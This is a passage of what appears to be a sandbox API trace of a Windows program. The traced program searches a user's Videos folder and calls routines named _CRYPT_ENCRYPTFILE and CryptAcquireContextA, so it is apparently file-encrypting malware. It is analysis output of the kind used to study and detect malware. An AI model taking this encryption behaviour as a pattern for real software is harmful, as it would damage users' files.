(HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0198.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0198.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0198.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0198.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0198.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0198.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0198.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.542] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0198.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0198.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0198.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd648 [0198.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd648, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0198.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0198.542] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0198.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0198.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0198.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0198.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0198.542] CloseHandle (hObject=0x158) returned 1 [0198.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0198.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0198.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0198.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0198.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0198.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0198.543] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0198.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0198.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0198.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0198.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0198.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0198.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0198.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0198.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0198.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0198.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0198.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0198.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0198.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0198.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0198.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0198.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.544] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0198.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0198.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0198.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0198.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0198.544] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.544] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0198.544] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.544] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0198.544] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0198.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0198.544] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.544] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.545] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.545] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2966e470, ftCreationTime.dwHighDateTime=0x1d5e12b, ftLastAccessTime.dwLowDateTime=0x1a312ae0, ftLastAccessTime.dwHighDateTime=0x1d5e489, ftLastWriteTime.dwLowDateTime=0x1a312ae0, ftLastWriteTime.dwHighDateTime=0x1d5e489, nFileSizeHigh=0x0, nFileSizeLow=0x2f3c, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="zEgvJih7.mp4", cAlternateFileName="")) returned 0x90add8 [0198.545] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0198.545] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.545] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2966e470, ftCreationTime.dwHighDateTime=0x1d5e12b, ftLastAccessTime.dwLowDateTime=0x1a312ae0, ftLastAccessTime.dwHighDateTime=0x1d5e489, ftLastWriteTime.dwLowDateTime=0x1a312ae0, ftLastWriteTime.dwHighDateTime=0x1d5e489, nFileSizeHigh=0x0, nFileSizeLow=0x2f3c, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="zEgvJih7.mp4", cAlternateFileName="")) returned 0x90add8 [0198.545] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0198.545] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GHIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIoo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ioo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oo2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zEgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EgvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gvJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vJih7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.547] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.547] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0198.547] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0198.547] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0198.547] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.547] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.547] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.547] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.547] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.550] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2966e470, ftCreationTime.dwHighDateTime=0x1d5e12b, ftLastAccessTime.dwLowDateTime=0x1a312ae0, ftLastAccessTime.dwHighDateTime=0x1d5e489, ftLastWriteTime.dwLowDateTime=0x1a312ae0, ftLastWriteTime.dwHighDateTime=0x1d5e489, nFileSizeHigh=0x0, nFileSizeLow=0x2f3c, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="zEgvJih7.mp4", cAlternateFileName="")) returned 0x90af58 [0198.550] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0198.550] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.550] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0198.550] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.550] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.550] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0198.550] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.550] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0198.551] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.551] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.551] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0198.551] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.551] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.551] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.551] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.551] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.551] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0198.551] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.551] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0198.552] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.552] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.552] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0198.552] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.552] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.552] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.552] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.552] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.552] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0198.552] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 